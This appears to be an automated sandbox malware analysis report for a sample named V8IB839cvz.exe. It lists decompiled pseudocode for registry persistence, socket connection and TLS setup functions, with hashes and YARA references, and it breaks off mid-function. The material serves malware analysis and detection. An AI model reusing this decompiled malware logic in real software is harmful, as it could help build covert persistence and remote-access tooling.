                                            • Opcode ID: 1713ae2899f0ed35138e561022a2b64eb203fe521744539b71220cc7ebfb2afe
                                            • Instruction ID: e1cf477cf1b8ff37c16f99f010d0e6d310a08c14521f23935d416739ed727e88
                                            • Opcode Fuzzy Hash: 1713ae2899f0ed35138e561022a2b64eb203fe521744539b71220cc7ebfb2afe
                                            • Instruction Fuzzy Hash: 15328E71A102145ACB18F762DC52AFEB3759B54308F5041BFB50ABA1E2EF385F85CA4D
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0040B917, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38registryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 77%
                                            			E0040B917(void* __ecx, char* __edx, char* _a4, char _a8, int _a32) {
				void* _v8;
				long _t12;
				int _t15;
				long _t17;
				signed int _t19;
				signed int _t20;

				_push(__ecx);
				_push(_t19);
				_t12 = RegCreateKeyA(0x80000001, __edx,  &_v8); // executed
				if(_t12 != 0) {
					_t20 = 0;
				} else {
					_t15 = E00401F26();
					_t17 = RegSetValueExA(_v8, _a4, 0, _a32, E00401F2E( &_a8), _t15); // executed
					RegCloseKey(_v8); // executed
					_t20 = _t19 & 0xffffff00 | _t17 == 0x00000000;
				}
				E00401F97();
				return _t20;
			}









                                            0x0040b91a
                                            0x0040b91b
                                            0x0040b926
                                            0x0040b92e
                                            0x0040b967
                                            0x0040b930
                                            0x0040b934
                                            0x0040b94e
                                            0x0040b959
                                            0x0040b962
                                            0x0040b962
                                            0x0040b96c
                                            0x0040b977

                                            APIs
                                            • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0040B926
                                            • RegSetValueExA.KERNELBASE(?,00455EC4,00000000,?,00000000,00000000,00461210,?,?,004098D7,00455EC4,3.1.4 Light), ref: 0040B94E
                                            • RegCloseKey.KERNELBASE(?,?,?,004098D7,00455EC4,3.1.4 Light), ref: 0040B959
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: CloseCreateValue
                                            • String ID: 3.1.4 Light
                                            • API String ID: 1818849710-1767115774
                                            • Opcode ID: 24eecb0d71d76bae1367de78f3101d1e4ceb5fa1243dfecda90b784fe4c6150b
                                            • Instruction ID: 3a14a77b46ac8600a3061f50f48ce08b0891e8cf467f994bbc54bd1fc66d2352
                                            • Opcode Fuzzy Hash: 24eecb0d71d76bae1367de78f3101d1e4ceb5fa1243dfecda90b784fe4c6150b
                                            • Instruction Fuzzy Hash: 26F06D76500118BBDF00AFA1EC05EEA376CEF05754F10826AFD05B6161EB359E10EA98
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004016F4, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60networkCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 59%
                                            			E004016F4(void* __edx, char _a4) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* _t12;
				signed int _t15;
				void* _t16;
				void* _t22;
				void* _t23;
				signed int _t25;
				void* _t31;
				char* _t32;
				void* _t33;

				_t22 = _t23;
				_t32 =  &_a4;
				_t12 = _t22 + 8;
				_t31 = _t12;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd"); // executed
				__imp__#4( *((intOrPtr*)(_t22 + 4)), _t12, 0x10); // executed
				if(_t12 != 0) {
					L5:
					return 0;
				}
				if( *((intOrPtr*)(_t22 + 1)) == _t12) {
					L9:
					return 1;
				}
				_t15 = E00415EED(_t22, _t23);
				 *(_t22 + 0x44) = _t15;
				if(_t15 == 0) {
					goto L5;
				}
				_t30 =  *((intOrPtr*)(_t22 + 4));
				_t16 = E00415F3B(_t15,  *((intOrPtr*)(_t22 + 4)));
				_t25 =  *(_t22 + 0x44);
				if(_t16 == 1) {
					if(E004169BC() == 1) {
						goto L9;
					}
					_t34 = _t33 - 0x18;
					E0040207E(_t22, _t33 - 0x18, "TLS Authentication failed");
					E0040207E(_t22, _t34 - 0x18, "[ERROR]");
					_t16 = E004160B6(E00410B51(_t22),  *(_t22 + 0x44));
					_t25 =  *(_t22 + 0x44);
				}
				E00415F32(_t16, _t22, _t25, _t30, _t31, _t32);
				 *(_t22 + 0x44) =  *(_t22 + 0x44) & 0x00000000;
				goto L5;
			}
















                                            0x004016fb
                                            0x004016fd
                                            0x00401702
                                            0x00401705
                                            0x0040170b
                                            0x0040170c
                                            0x0040170d
                                            0x0040170e
                                            0x0040170f
                                            0x00401717
                                            0x00401745
                                            0x00000000
                                            0x00401745
                                            0x0040171c
                                            0x0040178c
                                            0x00000000
                                            0x0040178c
                                            0x0040171e
                                            0x00401723
                                            0x00401728
                                            0x00000000
                                            0x00000000
                                            0x0040172a
                                            0x0040172f
                                            0x00401734
                                            0x0040173a
                                            0x00401757
                                            0x00000000
                                            0x00000000
                                            0x00401759
                                            0x00401763
                                            0x00401772
                                            0x00401782
                                            0x00401787
                                            0x00401787
                                            0x0040173c
                                            0x00401741
                                            0x00000000

                                            APIs
                                            • connect.WS2_32(?,?,00000010), ref: 0040170F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: connect
                                            • String ID: TLS Authentication failed$[ERROR]
                                            • API String ID: 1959786783-1964023390
                                            • Opcode ID: 5e888cf67b238d3a224af454c5be84a0b32f4f8291d2694fe6e382641e9f7090
                                            • Instruction ID: b15164e878de7349e73cc7241cca87e292c8a2002a64f1dec7df183dd6908b02
                                            • Opcode Fuzzy Hash: 5e888cf67b238d3a224af454c5be84a0b32f4f8291d2694fe6e382641e9f7090
                                            • Instruction Fuzzy Hash: 5C01083564060097DB09FFA5C9869AA3B56DF42304B04406FED005F3D3EABACC45C36A
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0040B766, Relevance: 4.5, APIs: 3, Instructions: 37registryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E0040B766(char* __edx, char* _a4, char* _a8) {
				void* _v8;
				int _v12;
				int _v16;
				int _t12;
				long _t14;
				long _t18;
				signed int _t19;

				_t12 = 4;
				_v12 = _t12;
				_v16 = _t12;
				_t14 = RegOpenKeyExA(0x80000001, __edx, 0, 0x20019,  &_v8); // executed
				if(_t14 != 0) {
					return 0;
				}
				_t18 = RegQueryValueExA(_v8, _a4, 0,  &_v16, _a8,  &_v12); // executed
				_t19 = RegCloseKey(_v8); // executed
				return _t19 & 0xffffff00 | _t18 == 0x00000000;
			}










                                            0x0040b76e
                                            0x0040b76f
                                            0x0040b772
                                            0x0040b786
                                            0x0040b78e
                                            0x00000000
                                            0x0040b7bd
                                            0x0040b7a4
                                            0x0040b7af
                                            0x00000000

                                            APIs
                                            • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 0040B786
                                            • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,00461210), ref: 0040B7A4
                                            • RegCloseKey.KERNELBASE(?), ref: 0040B7AF
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: CloseOpenQueryValue
                                            • String ID:
                                            • API String ID: 3677997916-0
                                            • Opcode ID: 720c31c22136b31c3895213aca82ba1f3ca56cb9990ecf4d89a5fc7c251408fb
                                            • Instruction ID: 1748d149cced2b2967f5ffd526fa6b6863d0e1020ac24f931012e51e0534a80e
                                            • Opcode Fuzzy Hash: 720c31c22136b31c3895213aca82ba1f3ca56cb9990ecf4d89a5fc7c251408fb
                                            • Instruction Fuzzy Hash: 87F0F976900218BFDF109FA09C45FEE7BBCEB45710F1040A5FE08E6150D2315E54AB98
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0040B7C3, Relevance: 4.5, APIs: 3, Instructions: 37registryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 66%
                                            			E0040B7C3(void* __ecx, void* __edx, char* _a4, char* _a8) {
				void* _v8;
				int _v12;
				char _v1036;
				long _t11;
				void* _t19;
				void* _t23;

				_v12 = 0x400;
				_t23 = __ecx;
				_t11 = RegOpenKeyExA(__edx, _a4, 0, 0x20019,  &_v8); // executed
				if(_t11 != 0) {
					_push(0x4554cc);
				} else {
					RegQueryValueExA(_v8, _a8, 0, 0,  &_v1036,  &_v12); // executed
					RegCloseKey(_v8);
					_push( &_v1036);
				}
				E0040207E(_t19, _t23);
				return _t23;
			}









                                            0x0040b7d0
                                            0x0040b7e2
                                            0x0040b7e5
                                            0x0040b7ed
                                            0x0040b81c
                                            0x0040b7ef
                                            0x0040b804
                                            0x0040b80d
                                            0x0040b819
                                            0x0040b819
                                            0x0040b823
                                            0x0040b82e

                                            APIs
                                            • RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 0040B7E5
                                            • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 0040B804
                                            • RegCloseKey.ADVAPI32(?), ref: 0040B80D
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: CloseOpenQueryValue
                                            • String ID:
                                            • API String ID: 3677997916-0
                                            • Opcode ID: 40e129a343f5d46cabcb252634cf24653a475a88ff9cef9c76c9b4312f262d03
                                            • Instruction ID: 8efa9b7c64d6fd6b3e2e17b4cad0c67649aa901a6ffa0ce92d46dbc2f2fae197
                                            • Opcode Fuzzy Hash: 40e129a343f5d46cabcb252634cf24653a475a88ff9cef9c76c9b4312f262d03
                                            • Instruction Fuzzy Hash: 27F0C27560020CBBDB20AB80DC45FEE777CEB04700F1040A6BB04B6190D7B05E44AB9C
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00412028, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 62COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 94%
                                            			E00412028(void* __ecx, void* __edx, void* __eflags) {
				signed int _t21;
				intOrPtr _t28;
				intOrPtr* _t31;
				signed int* _t37;
				void* _t39;
				signed int _t46;
				signed int _t56;
				void* _t58;
				void* _t60;

				_t39 = __ecx;
				E00447508(E00448AA0, _t58);
				 *((intOrPtr*)(_t58 - 0x10)) = _t60 - 0xc;
				_t21 = E00412145( *(_t58 + 8)); // executed
				_t56 = _t21;
				 *(_t58 - 0x18) = _t56;
				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
				 *((intOrPtr*)(_t58 - 0x14)) = E00403381();
				_t37 = L004025C0(_t39);
				E004121D9( *_t37,  *_t22, _t56);
				 *(_t58 - 4) =  *(_t58 - 4) | 0xffffffff;
				 *(_t58 - 0x18) = E00403255(_t39);
				if( *_t37 != 0) {
					E0040338A( *_t37,  *((intOrPtr*)( *((intOrPtr*)(_t58 - 0x14)))));
					_t31 = E00403378();
					asm("cdq");
					_t46 = 0x18;
					E00403373( *_t37, ( *_t31 -  *_t37) / _t46);
				}
				 *((intOrPtr*)(E00403378())) =  *(_t58 + 8) * 0x18 + _t56;
				_t28 =  *(_t58 - 0x18) * 0x18 + _t56;
				 *((intOrPtr*)( *((intOrPtr*)(_t58 - 0x14)))) = _t28;
				 *_t37 = _t56;
				 *[fs:0x0] =  *((intOrPtr*)(_t58 - 0xc));
				return _t28;
			}












                                            0x00412028
                                            0x0041202d
                                            0x00412038
                                            0x00412040
                                            0x00412045
                                            0x00412047
                                            0x0041204a
                                            0x00412057
                                            0x0041205f
                                            0x00412066
                                            0x0041206b
                                            0x00412076
                                            0x0041207c
                                            0x00412085
                                            0x0041208c
                                            0x00412095
                                            0x00412098
                                            0x0041209e
                                            0x0041209e
                                            0x004120b0
                                            0x004120b6
                                            0x004120bb
                                            0x004120bd
                                            0x004120c2
                                            0x004120cf

                                            APIs
                                            • __EH_prolog.LIBCMT ref: 0041202D
                                              • Part of subcall function 00403373: std::_Deallocate.LIBCONCRT ref: 0040351C
                                            Strings
                                            • C:\Users\user\Desktop\V8IB839cvz.exe, xrefs: 00412037
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: DeallocateH_prologstd::_
                                            • String ID: C:\Users\user\Desktop\V8IB839cvz.exe
                                            • API String ID: 3881773970-1245965800
                                            • Opcode ID: be5fbd94160fcadee574317fb5b935a41c6cc4c8af283e3de3d768c561ff36d9
                                            • Instruction ID: 06f0878bdd79a79b703600483d7ea5c162da129c9f6fce5c553c51b6f3bf2bf1
                                            • Opcode Fuzzy Hash: be5fbd94160fcadee574317fb5b935a41c6cc4c8af283e3de3d768c561ff36d9
                                            • Instruction Fuzzy Hash: 0F11B771A00114AFCB15EF69C882A7D7FBAEF85310F10416FF401AB2A1DBB50A10DBD5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00401494, Relevance: 3.0, APIs: 2, Instructions: 36COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 64%
                                            			E00401494(signed int _a4, signed int _a8, char _a12) {
				intOrPtr _v16;
				char _v20;
				intOrPtr _v32;
				char _v36;
				char _v52;
				void* __esi;
				signed int _t21;
				signed int _t22;
				signed int _t24;
				intOrPtr _t40;
				signed int _t42;
				signed int _t43;
				signed int _t45;
				char* _t48;
				signed int _t53;
				char* _t55;
				void* _t57;
				void* _t58;
				void* _t61;
				void* _t63;
				void* _t64;
				void* _t67;
				void* _t68;

				_t61 = _t67;
				_t42 = _a4;
				if(_t42 != 0) {
					_t22 = _t21 | 0xffffffff;
					_t53 = _t22 % _a8;
					__eflags = _t22 / _a8 - _t42;
					if(_t22 / _a8 >= _t42) {
						_t43 = _t42 * _a8;
						__eflags = _a12;
						if(__eflags == 0) {
							L8:
							_t24 = E004287AB(_t53, _t57, __eflags, _t43); // executed
							_t45 = _t24;
							goto L9;
						} else {
							__eflags = _t43 - 0x1000;
							if(__eflags < 0) {
								goto L8;
							} else {
								_t26 = _t43 + 0x23;
								__eflags = _t43 + 0x23 - _t43;
								if(__eflags <= 0) {
									goto L3;
								} else {
									_t40 = E004287AB(_t53, _t57, __eflags, _t26);
									_t11 = _t40 + 0x23; // 0x23
									_t45 = _t11 & 0xffffffe0;
									 *((intOrPtr*)(_t45 - 4)) = _t40;
									L9:
									return _t45;
								}
							}
						}
					} else {
						L3:
						_push(_t61);
						_t63 = _t67;
						_t68 = _t67 - 0xc;
						E00428F11( &_v20);
						E0042B694( &_v20, 0x45d0d4);
						asm("int3");
						_push(_t63);
						_t64 = _t68;
						E004296F6( &_v36, _v16);
						E0042B694( &_v36, 0x45d164);
						asm("int3");
						_push(_t64);
						_t48 =  &_v52;
						E0042974D(_t48, _v32);
						E0042B694( &_v52, 0x45d1a0);
						asm("int3");
						_t55 = _t48;
						__eflags = 1;
						asm("lock xadd [0x45f01c], eax");
						if(1 == 0) {
							_push(_t57);
							_t58 = 0x460040;
							do {
								E0042A078(_t58);
								_t58 = _t58 + 0x18;
								__eflags = _t58 - 0x460100;
							} while (_t58 < 0x460100);
						}
						return _t55;
					}
				} else {
					return 0;
				}
			}


























                                            0x00401495
                                            0x00401497
                                            0x0040149c
                                            0x004014a2
                                            0x004014a7
                                            0x004014aa
                                            0x004014ac
                                            0x004014b3
                                            0x004014b7
                                            0x004014bb
                                            0x004014de
                                            0x004014df
                                            0x004014e5
                                            0x00000000
                                            0x004014bd
                                            0x004014bd
                                            0x004014c3
                                            0x00000000
                                            0x004014c5
                                            0x004014c5
                                            0x004014c8
                                            0x004014ca
                                            0x00000000
                                            0x004014cc
                                            0x004014cd
                                            0x004014d3
                                            0x004014d6
                                            0x004014d9
                                            0x004014e7
                                            0x004014ea
                                            0x004014ea
                                            0x004014ca
                                            0x004014c3
                                            0x004014ae
                                            0x004014ae
                                            0x0042976e
                                            0x0042976f
                                            0x00429771
                                            0x00429777
                                            0x00429785
                                            0x0042978a
                                            0x0042978b
                                            0x0042978c
                                            0x00429797
                                            0x004297a5
                                            0x004297aa
                                            0x004297ab
                                            0x004297b1
                                            0x004297b7
                                            0x004297c5
                                            0x004297ca
                                            0x004297ce
                                            0x004297d0
                                            0x004297d1
                                            0x004297d9
                                            0x004297db
                                            0x004297dc
                                            0x004297e1
                                            0x004297e2
                                            0x004297e7
                                            0x004297eb
                                            0x004297eb
                                            0x004297f3
                                            0x004297f7
                                            0x004297f7
                                            0x0040149e
                                            0x004014a1
                                            0x004014a1

                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8c0de753f4f5281243447a1aba9935ee4285a0b508dfc1052cbff4d71a38e4d6
                                            • Instruction ID: 9258628ea43768acf29fe6636e3c312b261d489ce406fcaad439563616fe0a6d
                                            • Opcode Fuzzy Hash: 8c0de753f4f5281243447a1aba9935ee4285a0b508dfc1052cbff4d71a38e4d6
                                            • Instruction Fuzzy Hash: 25F0BE713142085ACF0C9F259D90A6E37999B84324F60873FF02AEA5F0DB3DD991820C
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004347D3, Relevance: 3.0, APIs: 2, Instructions: 35COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 92%
                                            			E004347D3(void* __ebx, void* __ecx) {
				void* _t2;
				intOrPtr _t3;
				signed int _t15;
				signed int _t16;

				if( *0x4604c0 == 0) {
					_push(_t15);
					E0043CAC9(__ecx); // executed
					_t2 = E0043CDCA(); // executed
					_t19 = _t2;
					if(_t2 != 0) {
						_t3 = E00434880(__ebx, _t19);
						if(_t3 != 0) {
							 *0x4604cc = _t3;
							E00442E36(0x4604c0, _t3);
							_t16 = 0;
						} else {
							_t16 = _t15 | 0xffffffff;
						}
						E00437795(0);
					} else {
						_t16 = _t15 | 0xffffffff;
					}
					E00437795(_t19);
					return _t16;
				} else {
					return 0;
				}
			}







                                            0x004347da
                                            0x004347e0
                                            0x004347e1
                                            0x004347e6
                                            0x004347eb
                                            0x004347ef
                                            0x004347f7
                                            0x004347ff
                                            0x0043480c
                                            0x00434811
                                            0x00434816
                                            0x00434801
                                            0x00434801
                                            0x00434801
                                            0x0043481a
                                            0x004347f1
                                            0x004347f1
                                            0x004347f1
                                            0x00434821
                                            0x0043482b
                                            0x004347dc
                                            0x004347de
                                            0x004347de

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: _free
                                            • String ID:
                                            • API String ID: 269201875-0
                                            • Opcode ID: 6b722e733cf3fa35e4cc80ca17b7c32c79fecafb72b172aeaca0f2c94792109d
                                            • Instruction ID: 2b5de5d8da4752ecfbab20582c16b7936df731b6fc599a9ee073b62a640cf5f2
                                            • Opcode Fuzzy Hash: 6b722e733cf3fa35e4cc80ca17b7c32c79fecafb72b172aeaca0f2c94792109d
                                            • Instruction Fuzzy Hash: 72E0E5A660652050D279323B3C057AB06459BCF37AF15673BF528961D1EF6CA80341AE
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00436F33, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 94%
                                            			E00436F33(void* __ecx, long _a4) {
				void* __esi;
				void* _t4;
				void* _t6;
				void* _t7;
				long _t8;

				_t7 = __ecx;
				_t8 = _a4;
				if(_t8 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E00432914())) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t8 == 0) {
					_t8 = _t8 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x46096c, 0, _t8); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E0043656D();
					if(__eflags == 0) {
						goto L7;
					}
					_t6 = E0043400B(_t7, _t8, __eflags, _t8);
					_pop(_t7);
					__eflags = _t6;
					if(_t6 == 0) {
						goto L7;
					}
				}
				return _t4;
			}








                                            0x00436f33
                                            0x00436f39
                                            0x00436f3f
                                            0x00436f71
                                            0x00436f76
                                            0x00436f7c
                                            0x00000000
                                            0x00436f7c
                                            0x00436f43
                                            0x00436f45
                                            0x00436f45
                                            0x00436f5c
                                            0x00436f65
                                            0x00436f6d
                                            0x00000000
                                            0x00000000
                                            0x00436f4d
                                            0x00436f4f
                                            0x00000000
                                            0x00000000
                                            0x00436f52
                                            0x00436f57
                                            0x00436f58
                                            0x00436f5a
                                            0x00000000
                                            0x00000000
                                            0x00436f5a
                                            0x00000000

                                            APIs
                                            • RtlAllocateHeap.NTDLL(00000000,0042979C,?,?,0042AEE7,?,?,3.1.4 Light,?,?,0040869A,0042979C,?,?,?,?), ref: 00436F65
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateHeap
                                            • String ID:
                                            • API String ID: 1279760036-0
                                            • Opcode ID: f0482595cad7ce0a37361c649d5eca77f2f44eea15911a797c496e9d34ec458a
                                            • Instruction ID: 8ef3cf6b047362ac99e0ad67c162f8fd8cf597f5ccc0b2e9c71ae86898448952
                                            • Opcode Fuzzy Hash: f0482595cad7ce0a37361c649d5eca77f2f44eea15911a797c496e9d34ec458a
                                            • Instruction Fuzzy Hash: 4CE0E53520021376EA217672BC00B5B3A689F4E3E4F1BA167EC06A6290CF69DC0195AD
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00401677, Relevance: 1.5, APIs: 1, Instructions: 30networkCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 37%
                                            			E00401677(char* __ecx) {
				intOrPtr _t8;
				char _t13;
				char* _t14;

				_t14 = __ecx;
				if( *0x460a60 != 0) {
					L3:
					__imp__#23(0, 1, 6); // executed
					 *((intOrPtr*)(_t14 + 4)) = _t8;
					if(_t8 == 0xffffffff) {
						L2:
						return 0;
					}
					_t13 =  *0x460a61; // 0x0
					 *((char*)(_t14 + 0x50)) = 0;
					 *((intOrPtr*)(_t14 + 0x54)) = 0;
					 *((intOrPtr*)(_t14 + 0x4c)) = 0x3e8;
					 *((char*)(_t14 + 0x65)) = 0;
					 *((char*)(_t14 + 1)) = _t13;
					 *((intOrPtr*)(_t14 + 0x44)) = 0;
					 *_t14 = 1;
					return 1;
				}
				_t8 = E004016CA(); // executed
				if(_t8 != 0) {
					goto L3;
				}
				goto L2;
			}






                                            0x00401680
                                            0x00401682
                                            0x00401691
                                            0x00401698
                                            0x0040169e
                                            0x004016a4
                                            0x0040168d
                                            0x00000000
                                            0x0040168d
                                            0x004016a6
                                            0x004016ae
                                            0x004016b1
                                            0x004016b4
                                            0x004016bb
                                            0x004016be
                                            0x004016c1
                                            0x004016c4
                                            0x00000000
                                            0x004016c4
                                            0x00401684
                                            0x0040168b
                                            0x00000000
                                            0x00000000
                                            0x00000000

                                            APIs
                                            • socket.WS2_32(00000000,00000001,00000006), ref: 00401698
                                              • Part of subcall function 004016CA: WSAStartup.WS2_32(00000202,00000000), ref: 004016DF
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: Startupsocket
                                            • String ID:
                                            • API String ID: 3996037109-0
                                            • Opcode ID: 6704b90da96933120db55e82a51c0d24d431404700829574176a24a2f0fae09c
                                            • Instruction ID: 379e8c66a4d7c8e7fd48b41340065aa275f0cd6c64dfc64f462ac86a7e9a6c34
                                            • Opcode Fuzzy Hash: 6704b90da96933120db55e82a51c0d24d431404700829574176a24a2f0fae09c
                                            • Instruction Fuzzy Hash: 68F0BE700157C05BD7308F7448807A7BFD45B23318F184E6EE4D663BE2C2BA6404DB29
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004016CA, Relevance: 1.5, APIs: 1, Instructions: 15networkCOMMON
                                            Download Yara Rule
                                            APIs
                                            • WSAStartup.WS2_32(00000202,00000000), ref: 004016DF
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: Startup
                                            • String ID:
                                            • API String ID: 724789610-0
                                            • Opcode ID: c9b7a817baaa7ddf12b03474a3ac07bb178b4f3759ddbb9ce7d536d1f17fcebb
                                            • Instruction ID: 927d854f27a87b31ca767e878d74b3bbfd1f86e740eb3d5847cbe5c36e1966da
                                            • Opcode Fuzzy Hash: c9b7a817baaa7ddf12b03474a3ac07bb178b4f3759ddbb9ce7d536d1f17fcebb
                                            • Instruction Fuzzy Hash: AAD0123256870C4ED610ABB4AC0FDE6776CD317A11F0003BAACB5829D2F740171CC6AB
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Non-executed Functions

                                            Function 0040D14F, Relevance: 60.2, APIs: 31, Strings: 3, Instructions: 732COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 87%
                                            			E0040D14F(void* __edx, void* __eflags, intOrPtr _a4) {
				char _v116;
				char _v120;
				char _v140;
				char _v156;
				char _v164;
				void* _v172;
				char _v192;
				void* _v196;
				char _v212;
				char _v216;
				void* _v220;
				char _v240;
				void* _v244;
				char _v252;
				char _v264;
				void* _v268;
				void* _v284;
				char _v288;
				void* _v292;
				char _v304;
				char _v308;
				char _v312;
				char _v332;
				char _v336;
				char _v340;
				char _v360;
				void* _v364;
				char _v368;
				long _v372;
				short* _v376;
				char _v388;
				void* _v392;
				char _v400;
				char _v404;
				short* _v408;
				char _v412;
				char _v416;
				char _v420;
				char _v424;
				char _v428;
				char _v432;
				char _v436;
				char _v440;
				char _v444;
				char _v452;
				char _v500;
				char _v504;
				struct HWND__* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				int _t187;
				void* _t191;
				WCHAR* _t199;
				void* _t219;
